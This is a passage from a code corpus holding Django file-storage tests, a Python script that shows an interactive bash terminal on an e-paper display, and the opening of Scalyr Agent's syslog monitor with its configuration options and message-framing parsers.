    def get_available_name(self, name, max_length=None):
        """Override the effort to find an unused name."""
        return name
class OverwritingStorageTests(FileStorageTests):
    storage_class = OverwritingStorage

    def test_save_overwrite_behavior(self):
        """Saving to same file name twice overwrites the first file."""
        name = 'test.file'
        self.assertFalse(self.storage.exists(name))
        first_content = b'content one'
        second_content = b'second content'
        stored_name_1 = self.storage.save(name, ContentFile(first_content))
        try:
            # First save lands under the exact requested name.
            self.assertEqual(stored_name_1, name)
            self.assertTrue(self.storage.exists(name))
            self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
            with self.storage.open(name) as fp:
                self.assertEqual(fp.read(), first_content)
            # Second save replaces the contents rather than renaming.
            stored_name_2 = self.storage.save(name, ContentFile(second_content))
            self.assertEqual(stored_name_2, name)
            self.assertTrue(self.storage.exists(name))
            self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
            with self.storage.open(name) as fp:
                self.assertEqual(fp.read(), second_content)
        finally:
            self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
    def _save(self, name, content):
        # Discard falsy content instead of writing an empty file.
        if not content:
            return ''
        return super()._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
    storage_class = DiscardingFalseContentStorage

    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should include
        the name argument so that bool(file) evaluates to True (#26495).
        """
        buffer = StringIO('content')
        self.storage.save('tests/stringio', buffer)
        self.assertTrue(self.storage.exists('tests/stringio'))
        with self.storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
    """FileField behavior backed by the module-level temp_storage."""

    def tearDown(self):
        shutil.rmtree(temp_storage_location)

    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        dir_to_test = storage.location
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255  # Should be safe on most backends

    def test_files(self):
        self.assertIsInstance(Storage.normal, FileDescriptor)

        # An object without a file has limited functionality.
        obj1 = Storage()
        self.assertEqual(obj1.normal.name, "")
        with self.assertRaises(ValueError):
            obj1.normal.size

        # Saving a file enables full functionality.
        obj1.normal.save("django_test.txt", ContentFile("content"))
        self.assertEqual(obj1.normal.name, "tests/django_test.txt")
        self.assertEqual(obj1.normal.size, 7)
        self.assertEqual(obj1.normal.read(), b"content")
        obj1.normal.close()

        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model it's attached to is saved.
        obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(dirs, [])
        self.assertNotIn("assignment.txt", files)

        obj1.save()
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])

        # Save another file with the same name.
        obj2 = Storage()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        obj2_name = obj2.normal.name
        self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        self.assertEqual(obj2.normal.size, 12)
        obj2.normal.close()

        # Deleting an object does not delete the file it uses.
        obj2.delete()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        self.assertNotEqual(obj2_name, obj2.normal.name)
        self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        obj2.normal.close()

    def test_filefield_read(self):
        # Files can be read in a little at a time, if necessary.
        obj = Storage.objects.create(
            normal=SimpleUploadedFile("assignment.txt", b"content"))
        obj.normal.open()
        self.assertEqual(obj.normal.read(3), b"con")
        self.assertEqual(obj.normal.read(), b"tent")
        self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
        obj.normal.close()

    def test_filefield_write(self):
        # Files can be written to.
        obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
        with obj.normal as normal:
            normal.open('wb')
            normal.write(b'updated')
        obj.refresh_from_db()
        self.assertEqual(obj.normal.read(), b'updated')
        obj.normal.close()

    def test_filefield_reopen(self):
        obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
        with obj.normal as normal:
            normal.open()
        obj.normal.open()
        obj.normal.file.seek(0)
        obj.normal.close()

    def test_duplicate_filename(self):
        # Multiple files with the same name get _(7 random chars) appended to them.
        objs = [Storage() for i in range(2)]
        for o in objs:
            o.normal.save("multiple_files.txt", ContentFile("Same Content"))
        try:
            names = [o.normal.name for o in objs]
            self.assertEqual(names[0], "tests/multiple_files.txt")
            self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
        finally:
            for o in objs:
                o.delete()

    def test_file_truncation(self):
        # Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename get truncated in order to fit
        # in _(7 random chars). When most of the max_length is taken by
        # dirname + extension and there are not enough characters in the
        # filename to truncate, an exception should be raised.
        objs = [Storage() for i in range(2)]
        filename = 'filename.ext'

        for o in objs:
            o.limited_length.save(filename, ContentFile('Same Content'))
        try:
            # Testing truncation.
            names = [o.limited_length.name for o in objs]
            self.assertEqual(names[0], 'tests/%s' % filename)
            self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)

            # Testing exception is raised when filename is too short to truncate.
            filename = 'short.longext'
            objs[0].limited_length.save(filename, ContentFile('Same Content'))
            with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                # Was save(*(filename, ContentFile(...))): pointless star-unpack.
                objs[1].limited_length.save(filename, ContentFile('Same Content'))
        finally:
            for o in objs:
                o.delete()

    @unittest.skipIf(
        sys.platform.startswith('win'),
        "Windows supports at most 260 characters in a path.",
    )
    def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most systems have filename
        # length limitation of 255. Path takes extra chars.
        filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a'  # 4 chars for extension.
        obj = Storage()
        obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
        self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
        self.assertEqual(obj.extended_length.read(), b'Same Content')
        obj.extended_length.close()

    def test_filefield_default(self):
        # Default values allow an object to access a single file.
        temp_storage.save('tests/default.txt', ContentFile('default content'))
        obj = Storage.objects.create()
        self.assertEqual(obj.default.name, "tests/default.txt")
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

        # But it shouldn't be deleted, even if there are no more objects using
        # it.
        obj.delete()
        obj = Storage()
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

    def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use subdirectory.
        obj = Storage()
        obj.empty.save('django_test.txt', ContentFile('more content'))
        self.assertEqual(obj.empty.name, "django_test.txt")
        self.assertEqual(obj.empty.read(), b"more content")
        obj.empty.close()

    def test_pathlib_upload_to(self):
        obj = Storage()
        obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
        self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
        obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
        self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
        # Close the fields this test actually saved; previously this closed
        # the unrelated (and never-opened) obj.random field, leaving both
        # saved files open.
        obj.pathlib_callable.close()
        obj.pathlib_direct.close()

    def test_random_upload_to(self):
        # Verify the fix for #5655, making sure the directory is only
        # determined once.
        obj = Storage()
        obj.random.save("random_file", ContentFile("random content"))
        self.assertTrue(obj.random.name.endswith("/random_file"))
        obj.random.close()

    def test_custom_valid_name_callable_upload_to(self):
        """
        Storage.get_valid_name() should be called when upload_to is a callable.
        """
        obj = Storage()
        obj.custom_valid_name.save("random_file", ContentFile("random content"))
        # CustomValidNameStorage.get_valid_name() appends '_valid' to the name
        self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
        obj.custom_valid_name.close()

    def test_filefield_pickling(self):
        # Push an object into the cache to make sure it pickles properly
        obj = Storage()
        obj.normal.save("django_test.txt", ContentFile("more content"))
        obj.normal.close()
        cache.set("obj", obj)
        self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")

    def test_file_object(self):
        # Create sample file
        temp_storage.save('tests/example.txt', ContentFile('some content'))

        # Load it as Python file object
        with open(temp_storage.path('tests/example.txt')) as file_obj:
            # Save it using storage and read its content
            temp_storage.save('tests/file_obj', file_obj)
        self.assertTrue(temp_storage.exists('tests/file_obj'))
        with temp_storage.open('tests/file_obj') as f:
            self.assertEqual(f.read(), b'some content')

    def test_stringio(self):
        # Test passing StringIO instance as content argument to save
        output = StringIO()
        output.write('content')
        output.seek(0)

        # Save it and read written file
        temp_storage.save('tests/stringio', output)
        self.assertTrue(temp_storage.exists('tests/stringio'))
        with temp_storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    # File whose chunks() stalls for a second before delegating to
    # ContentFile.chunks(), widening the save window so that two concurrent
    # save() calls are likely to collide on the same name (#4948).
    def chunks(self):
        time.sleep(1)
        return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
    """Two simultaneous saves of the same name must not clobber each other."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        # SlowFile delays chunks() so both saves overlap in time.
        self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        saved = sorted(os.listdir(self.storage_dir))
        self.assertEqual(saved[0], 'conflict')
        self.assertRegex(saved[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """The FILE_UPLOAD_* permission settings are applied to saved files/dirs."""

    def setUp(self):
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        mode = os.stat(self.storage.path(name)).st_mode & 0o777
        self.assertEqual(mode, 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        # With no explicit setting, files get 0o666 masked by the umask.
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(name)).st_mode & 0o777
        self.assertEqual(mode, 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        parent = os.path.dirname(self.storage.path(name))
        self.assertEqual(os.stat(parent).st_mode & 0o777, 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        parent = os.path.dirname(self.storage.path(name))
        self.assertEqual(os.stat(parent).st_mode & 0o777, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
    """How duplicate file names are mangled when the path contains dots."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def _save_twice(self, name):
        # Save the same name twice so the second save must be renamed,
        # and return the sorted listing of the dotted directory.
        self.storage.save(name, ContentFile("1"))
        self.storage.save(name, ContentFile("2"))
        return sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))

    def test_directory_with_dot(self):
        """Regression test for #9610.

        If the directory name contains a dot and the file name doesn't, the
        file name must be mangled, not the directory name.
        """
        listing = self._save_twice('dotted.path/test')
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(listing[0], 'test')
        self.assertRegex(listing[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an
        extension, so the underscore suffix goes at the very end.
        """
        listing = self._save_twice('dotted.path/.test')
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(listing[0], '.test')
        self.assertRegex(listing[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    """Saving ContentFile instances through FileSystemStorage."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_content_saving(self):
        """
        ContentFile can be saved correctly with the filesystem storage,
        whether it was initialized with bytes or with unicode content.
        """
        for name, content in (('bytes.txt', b"content"), ('unicode.txt', "español")):
            self.storage.save(name, ContentFile(content))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """
    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib_request_urlopen(self):
        """
        Test the File storage API with a file-like object coming from
        urllib.request.urlopen().
        """
        # Close both HTTP responses deterministically via context managers;
        # the original left the sockets open until garbage collection.
        with urlopen(self.live_server_url + '/') as file_like_object:
            stored_filename = self.storage.save("remote_file.html", File(file_like_object))
        with urlopen(self.live_server_url + '/') as remote_file:
            with self.storage.open(stored_filename) as stored_file:
                self.assertEqual(stored_file.read(), remote_file.read())
|
keyboard.py | import os
import pty
import pyte
from threading import Thread
from epaper import EPaper
import time
from key_events import ExclusiveKeyReader
from keys import KeyHandler
# In-memory VT100 emulator: bash's output is fed into `screen`, and the
# e-paper panel is redrawn from it. 34x18 presumably matches the panel's
# text grid — confirm against the EPaper driver.
screen = pyte.Screen(34, 18)
stream = pyte.Stream()
stream.attach(screen)
# Advertise the same geometry to the child shell via the environment.
os.environ["COLUMNS"] = "34"
os.environ["LINES"] = "18"
paper = EPaper("/dev/ttyS0", debug=False)

# Run bash on the slave end of a pseudo-terminal; the parent keeps `fd`,
# the master end, for both reading output and writing keystrokes.
child_pid, fd = pty.fork()
if child_pid == 0:
    # Child: replace this process with an interactive bash
    # (argv[0] set to "PaperTerminal" for ps output).
    os.execlp("/bin/bash", "PaperTerminal", "-i")
else:
    def read_bash():
        # Pump bash's output into the terminal emulator until the pty
        # closes (os.read raises OSError once the child side goes away).
        while True:
            try:
                out = os.read(fd, 4096)
                stream.feed(out.decode("utf-8"))
            except OSError:
                break
    bash_thread = Thread(target=read_bash)
    bash_thread.daemon = True
    bash_thread.start()

    def displayer():
        # Poll every 2 seconds and redraw the e-paper only when the screen
        # text or the cursor position actually changed.
        prev_screen = ""
        prev_x, prev_y = 100, 100  # impossible!
        while True:
            s = screen.display
            if (("\n".join(s) != prev_screen) or
                    (prev_x != screen.cursor.x) or
                    (prev_y != screen.cursor.y)):
                paper.cls()
                paper.draw_screen(s)
                paper.draw_cursor(screen.cursor.y, screen.cursor.x)
                paper.finalize()
                prev_screen = "\n".join(s)
                prev_x, prev_y = screen.cursor.x, screen.cursor.y
            time.sleep(2)
    display_thread = Thread(target=displayer)
    display_thread.daemon = True
    display_thread.start()

    def feed_fn(asc):
        # Forward a decoded key (integer codepoint) to bash's stdin.
        os.write(fd, bytes(chr(asc), "utf-8"))

    # Grab the keyboard device exclusively and run the key loop in the
    # foreground; everything else happens on the daemon threads above.
    with ExclusiveKeyReader("/dev/input/event1") as key_reader:
        key_handler = KeyHandler(key_reader, feed_fn)
        key_handler.run()
|
syslog_monitor.py | # Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
# author: Imron Alston <imron@scalyr.com>
__author__ = 'imron@scalyr.com'
import errno
import glob
import logging
import logging.handlers
import os
import os.path
import re
from socket import error as socket_error
import socket
import struct
import SocketServer
import threading
import time
import traceback
from string import Template
from threading import Timer
from scalyr_agent import ScalyrMonitor, define_config_option, AutoFlushingRotatingFileHandler
from scalyr_agent.log_watcher import LogWatcher
from scalyr_agent.scalyr_logging import DEBUG_LEVEL_0, DEBUG_LEVEL_1, DEBUG_LEVEL_2
from scalyr_agent.scalyr_logging import DEBUG_LEVEL_3, DEBUG_LEVEL_4, DEBUG_LEVEL_5
from scalyr_agent.monitor_utils.server_processors import RequestSizeExceeded
from scalyr_agent.monitor_utils.server_processors import RequestStream
from scalyr_agent.monitor_utils.auto_flushing_rotating_file import AutoFlushingRotatingFile
from scalyr_agent.util import StoppableThread
from scalyr_agent.json_lib import JsonObject
import scalyr_agent.scalyr_logging as scalyr_logging
global_log = scalyr_logging.getLogger(__name__)
__monitor__ = __name__
# NOTE(review): appears related to periodic expiry of cached per-container
# loggers — confirm where it is consumed later in this module.
RUN_EXPIRE_COUNT = 100

# --- Core syslog-server options -------------------------------------------
define_config_option(__monitor__, 'module',
                     'Always ``scalyr_agent.builtin_monitors.syslog_monitor``',
                     convert_to=str, required_option=True)
define_config_option( __monitor__, 'protocols',
                      'Optional (defaults to ``tcp:601``). Lists the protocols and ports on which the agent will accept '
                      'messages. You can include one or more entries, separated by commas. Each entry must be of the '
                      'form ``tcp:NNN`` or ``udp:NNN``. Port numbers are optional, defaulting to 601 for TCP and 514 '
                      'for UDP',
                      convert_to=str, default='tcp')
define_config_option(__monitor__, 'accept_remote_connections',
                     'Optional (defaults to false). If true, the plugin will accept network connections from any host; '
                     'otherwise, it will only accept connections from localhost.',
                     default=False, convert_to=bool)
define_config_option( __monitor__, 'message_log',
                      'Optional (defaults to ``agent_syslog.log``). Specifies the file name under which syslog messages '
                      'are stored. The file will be placed in the default Scalyr log directory, unless it is an '
                      'absolute path',
                      convert_to=str, default='agent_syslog.log')
define_config_option( __monitor__, 'parser',
                      'Optional (defaults to ``agentSyslog``). Defines the parser name associated with the log file',
                      convert_to=str, default='agentSyslog')
define_config_option( __monitor__, 'tcp_buffer_size',
                      'Optional (defaults to 8K). The maximum buffer size for a single TCP syslog message. '
                      'Note: RFC 5425 (syslog over TCP/TLS) says syslog receivers MUST be able to support messages at least 2048 bytes long, and recommends they SHOULD '
                      'support messages up to 8192 bytes long.',
                      default=8192, min_value=2048, max_value=65536*1024, convert_to=int)

# --- Log-rotation options --------------------------------------------------
define_config_option( __monitor__, 'max_log_size',
                      'Optional (defaults to None). How large the log file will grow before it is rotated. If None, then the '
                      'default value will be taken from the monitor level or the global level log_rotation_max_bytes config option. Set to zero '
                      'for infinite size. Note that rotation is not visible in Scalyr; it is only relevant for managing '
                      'disk space on the host running the agent. However, a very small limit could cause logs to be '
                      'dropped if there is a temporary network outage and the log overflows before it can be sent to '
                      'Scalyr',
                      convert_to=int, default=None)
define_config_option( __monitor__, 'max_log_rotations',
                      'Optional (defaults to None). The maximum number of log rotations before older log files are '
                      'deleted. If None, then the value is taken from the monitor level or the global level log_rotation_backup_count option. '
                      'Set to zero for infinite rotations.',
                      convert_to=int, default=None)
define_config_option( __monitor__, 'log_flush_delay',
                      'Optional (defaults to 1.0). The time to wait in seconds between flushing the log file containing '
                      'the syslog messages.',
                      convert_to=float, default=1.0)

# --- Docker-mode options ---------------------------------------------------
define_config_option(__monitor__, 'mode',
                     'Optional (defaults to "syslog"). If set to "docker", the plugin will enable extra functionality '
                     'to properly receive log lines sent via the `docker_monitor`. In particular, the plugin will '
                     'check for container ids in the tags of the incoming lines and create log files based on their '
                     'container names.',
                     default='syslog', convert_to=str)
define_config_option( __monitor__, 'docker_regex',
                      'Regular expression for parsing out docker logs from a syslog message when the tag sent to syslog '
                      'only has the container id. If a message matches this regex then everything *after* '
                      'the full matching expression will be logged to a file called docker-<container-name>.log',
                      convert_to=str, default='^.*([a-z0-9]{12})\[\d+\]: ?')
define_config_option( __monitor__, 'docker_regex_full',
                      'Regular expression for parsing out docker logs from a syslog message when the tag sent to syslog '
                      'included both the container name and id. If a message matches this regex then everything *after* '
                      'the full matching expression will be logged to a file called docker-<container-name>.log',
                      convert_to=str, default='^.*([^/]+)/([^[]+)\[\d+\]: ?')
define_config_option( __monitor__, 'docker_expire_log',
                      'Optional (defaults to 300). The number of seconds of inactivity from a specific container before '
                      'the log file is removed. The log will be created again if a new message comes in from the container',
                      default=300, convert_to=int)
define_config_option( __monitor__, 'docker_accept_ips',
                      'Optional. A list of ip addresses to accept connections from if being run in a docker container. '
                      'Defaults to a list with the ip address of the default docker bridge gateway. '
                      'If accept_remote_connections is true, this option does nothing.')
define_config_option(__monitor__, 'docker_api_socket',
                     'Optional (defaults to /var/scalyr/docker.sock). Defines the unix socket used to communicate with '
                     'the docker API. This is only used when `mode` is set to `docker` to look up container '
                     'names by their ids. WARNING, you must also set the `api_socket` configuration option in the '
                     'docker monitor to this same value.\n'
                     'Note: You need to map the host\'s /run/docker.sock to the same value as specified here, using '
                     'the -v parameter, e.g.\n'
                     '\tdocker run -v /run/docker.sock:/var/scalyr/docker.sock ...',
                     convert_to=str, default='/var/scalyr/docker.sock')
define_config_option(__monitor__, 'docker_api_version',
                     'Optional (defaults to \'auto\'). The version of the Docker API to use when communicating to '
                     'docker. WARNING, you must also set the `docker_api_version` configuration option in the docker '
                     'monitor to this same value.', convert_to=str, default='auto')
define_config_option(__monitor__, 'docker_logfile_template',
                     'Optional (defaults to \'containers/${CNAME}.log\'). The template used to create the log '
                     'file paths for save docker logs sent by other containers via syslog. The variables $CNAME and '
                     '$CID will be substituted with the name and id of the container that is emitting the logs. If '
                     'the path is not absolute, then it is assumed to be relative to the main Scalyr Agent log '
                     'directory.', convert_to=str, default='containers/${CNAME}.log')
define_config_option(__monitor__, 'docker_cid_cache_lifetime_secs',
                     'Optional (defaults to 300). Controls the docker id to container name cache expiration. After '
                     'this number of seconds of inactivity, the cache entry will be evicted.',
                     convert_to=float, default=300.0)
define_config_option(__monitor__, 'docker_cid_clean_time_secs',
                     'Optional (defaults to 5.0). The number seconds to wait between cleaning the docker id to '
                     'container name cache.',
                     convert_to=float, default=5.0)
define_config_option(__monitor__, 'docker_use_daemon_to_resolve',
                     'Optional (defaults to True). If True, will use the Docker daemon (via the docker_api_socket to '
                     'resolve container ids to container names. If you set this to False, you must be sure to add the '
                     '--log-opt tag="/{{.Name}}/{{.ID}}" to your running containers to pass the container name in the '
                     'log messages.',
                     convert_to=bool, default=True)
define_config_option(__monitor__, 'docker_check_for_unused_logs_mins',
                     'Optional (defaults to 60). The number of minutes to wait between checking to see if there are any '
                     'log files matchings the docker_logfile_template that haven\'t been written to for a while and can '
                     'be deleted',
                     convert_to=int, default=60)
define_config_option(__monitor__, 'docker_delete_unused_logs_hours',
                     'Optional (defaults to 24). The number of hours to wait before deleting any '
                     'log files matchings the docker_logfile_template',
                     convert_to=int, default=24)
define_config_option(__monitor__, 'docker_check_rotated_timestamps',
                     'Optional (defaults to True). If True, will check timestamps of all file rotations to see if they '
                     'should be individually deleted based on the the log deletion configuration options. '
                     'If False, only the file modification time of the main log file is checked, and the rotated files '
                     'will only be deleted when the main log file is deleted.',
                     convert_to=bool, default=True)
def _get_default_gateway():
    """Read the default gateway directly from /proc.

    Returns the gateway's dotted-quad IPv4 address, or 'localhost' if
    /proc/net/route is unreadable or contains no usable default route.
    """
    result = 'localhost'
    fh = None
    try:
        fh = open("/proc/net/route")
        for line in fh:
            fields = line.strip().split()
            # Skip non-default routes (destination column != 0.0.0.0) and
            # entries without the RTF_GATEWAY flag (bit 0x2 of the flags).
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            # The gateway column is a little-endian hex-encoded IPv4 address.
            result = socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    except IOError, e:
        global_log.error('Error while getting the default gateway: %s', str(e), limit_once_per_x_secs=300,
                         limit_key='_get_default_gateway_error')
    finally:
        if fh:
            fh.close()
    return result
class SyslogFrameParser(object):
    """Stateless parser exposing parse_request() for pulling one complete
    syslog message at a time out of a buffer.

    Messages are either newline (or crlf) terminated ("unframed"), or
    prefixed with a decimal octet count followed by a space ("framed").
    The parser detects which form it is looking at and handles both.
    """

    def __init__(self, max_request_size):
        """Creates a new instance.

        @param max_request_size: The maximum number of bytes that can be
            contained in an individual request.
        """
        self._max_size = max_request_size

    def parse_request(self, input_buffer, _):
        """Return the next complete message from 'input_buffer', or None.

        Bytes are consumed from 'input_buffer' only when a full message is
        available; otherwise the buffer position is restored untouched.

        @param input_buffer: The bytes to read.
        @param _: The number of bytes available in 'input_buffer' (unused).
        @return: The next complete request string, or None if incomplete.
            Raises RequestSizeExceeded when a message exceeds the maximum
            request size, and ValueError when a framed message's length
            prefix is not delimited by a space.
        """
        start = input_buffer.tell()
        data = input_buffer.read(self._max_size + 1)
        count = len(data)
        if count > self._max_size:
            # Over-long message: warn and leave the buffer where read() put
            # it — the connection is torn down after this error anyway.
            global_log.warning("SyslogFrameParser - bytes received exceed buffer size. Some logs may be lost.")
            raise RequestSizeExceeded(count, self._max_size)
        if count == 0:
            input_buffer.seek(start)
            return None
        # A leading digit marks an octet-count frame; otherwise scan for a
        # terminating newline. Offsets of (x, 0) mean "no full message yet".
        try:
            if '0' <= data[0] <= '9':
                begin, end = self._framed_offsets(data, count)
            else:
                begin, end = self._unframed_offsets(data, count)
        except ValueError:
            input_buffer.seek(start)
            raise
        if end == 0:
            input_buffer.seek(start)
            return None
        # Advance the buffer past the message and hand back the slice.
        input_buffer.seek(start + end)
        return data[begin:end]

    def _framed_offsets(self, frame_buffer, length):
        # Frame looks like "<size> <message>". Return (start, end) of the
        # message body, or (0, 0) if the full frame has not arrived yet.
        space = frame_buffer.find(' ')
        if space == -1:
            return (0, 0)
        frame_size = int(frame_buffer[0:space])
        begin = space + 1
        if length - begin >= frame_size:
            return (begin, begin + frame_size)
        return (0, 0)

    def _unframed_offsets(self, frame_buffer, length):
        # Message runs up to and including the first newline; (0, 0) when
        # no newline has arrived yet.
        newline = frame_buffer.find('\n')
        return (0, newline + 1) if newline != -1 else (0, 0)
class SyslogUDPHandler( SocketServer.BaseRequestHandler ):
    """Adapts a single UDP datagram to the protocol-neutral syslog handler."""
    def handle( self ):
        # For UDP servers, self.request is (data, socket); only the payload
        # matters here.
        data = self.request[0]
        self.server.syslog_handler.handle( data.strip() )
class SyslogRequestParser( object ):
    """Incremental reader/framer for a single TCP syslog connection.

    read() pulls raw bytes off the (non-blocking) socket; process() splits
    the accumulated bytes into individual syslog frames and passes each
    frame to a caller-supplied handler, carrying partial frames over to the
    next call.
    """
    def __init__( self, socket, max_buffer_size ):
        # NOTE: the `socket` parameter shadows the module-level socket
        # import within this method only.
        self._socket = socket
        if socket:
            # Non-blocking so read() can return None instead of stalling.
            self._socket.setblocking( False )
        # Bytes carried over from the previous process() call (partial frame).
        self._remaining = None
        self._max_buffer_size = max_buffer_size
        self.is_closed = False
    def read( self ):
        """Reads self._max_buffer_size bytes from the buffer"""
        # Returns None when no data is available yet (timeout / EAGAIN);
        # sets self.is_closed when the peer has disconnected.
        data = None
        try:
            data = self._socket.recv( self._max_buffer_size )
            if not data:
                self.is_closed = True
        except socket.timeout:
            self._socket_error = True
            return None
        except socket.error, e:
            if e.errno == errno.EAGAIN:
                return None
            else:
                global_log.warning('Network error while reading from syslog: %s', str(e), limit_once_per_x_secs=300,
                                   limit_key='syslog-network-error')
                self._socket_error = True
                raise e
        return data
    def process( self, data, handle_frame ):
        """Processes data returned from a previous call to read

        Appends `data` to any leftover bytes from the previous call, then
        repeatedly extracts complete frames (newline-terminated, or prefixed
        with a decimal octet count and a space) and invokes handle_frame for
        each. Incomplete trailing bytes are kept in self._remaining.
        """
        if not data:
            global_log.warning('Syslog has seen an empty request, could be an indication of missing data',
                               limit_once_per_x_secs=600, limit_key='syslog-empty-request')
            return
        # append data to what we had remaining from the previous call
        if self._remaining:
            self._remaining += data
        else:
            self._remaining = data
            self._offset = 0
        size = len( self._remaining )
        # process the buffer until we are out of bytes
        frames_handled = 0
        while self._offset < size:
            # get the first byte to determine if framed or not
            c = self._remaining[self._offset]
            framed = (c >= '0' and c <= '9')
            skip = 0 # do we need to skip any bytes at the end of the frame (e.g. newlines)
            #if framed, read the frame size
            if framed:
                frame_end = -1
                pos = self._remaining.find( " ", self._offset )
                if pos != -1:
                    frame_size = int( self._remaining[self._offset:pos] )
                    message_offset = pos + 1
                    # Only consume the frame once all of its bytes arrived.
                    if size - message_offset >= frame_size:
                        self._offset = message_offset
                        frame_end = self._offset + frame_size
            else:
                # not framed, find the first newline
                frame_end = self._remaining.find( "\n", self._offset )
                skip = 1
            # if we couldn't find the end of a frame, then it's time
            # to exit the loop and wait for more data
            if frame_end == -1:
                #if the remaining bytes exceed the maximum buffer size, issue a warning
                #and dump existing contents to the handler
                if size - self._offset >= self._max_buffer_size:
